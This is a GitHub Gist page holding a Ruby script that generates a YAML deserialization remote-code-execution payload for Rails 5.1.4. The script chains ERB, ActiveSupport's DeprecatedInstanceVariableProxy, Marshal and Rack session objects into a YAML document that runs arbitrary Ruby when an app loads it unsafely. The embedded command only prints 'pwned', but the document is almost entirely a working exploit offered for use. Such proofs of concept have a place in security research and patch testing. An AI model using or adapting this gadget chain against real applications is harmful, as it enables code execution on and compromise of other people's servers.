-
-
Save zpv/5d23f4831cbca9b64c57370eef371e87 to your computer and use it in GitHub Desktop.
Rails 5.1.4 YAML unsafe deserialization RCE payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'yaml' | |
require 'base64' | |
require 'erb' | |
class ActiveSupport | |
class Deprecation | |
def initialize() | |
@silenced = true | |
end | |
class DeprecatedInstanceVariableProxy | |
def initialize(instance, method) | |
@instance = instance | |
@method = method | |
@deprecator = ActiveSupport::Deprecation.new | |
end | |
end | |
end | |
end | |
code = <<-EOS | |
puts "pwned" | |
EOS | |
erb = ERB.allocate | |
erb.instance_variable_set :@src, code | |
erb.instance_variable_set :@lineno, 1337 | |
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result | |
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "") | |
payload = <<-PAYLOAD | |
--- | |
!ruby/object:Gem::Requirement | |
requirements: | |
!ruby/object:Rack::Session::Abstract::SessionHash | |
req: !ruby/object:Rack::Request | |
env: | |
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash | |
id: 'hi from espr' | |
HTTP_COOKIE: "a=#{payload}" | |
store: !ruby/object:Rack::Session::Cookie | |
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {} | |
key: a | |
secrets: [] | |
exists: true | |
loaded: false | |
PAYLOAD | |
puts payload |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment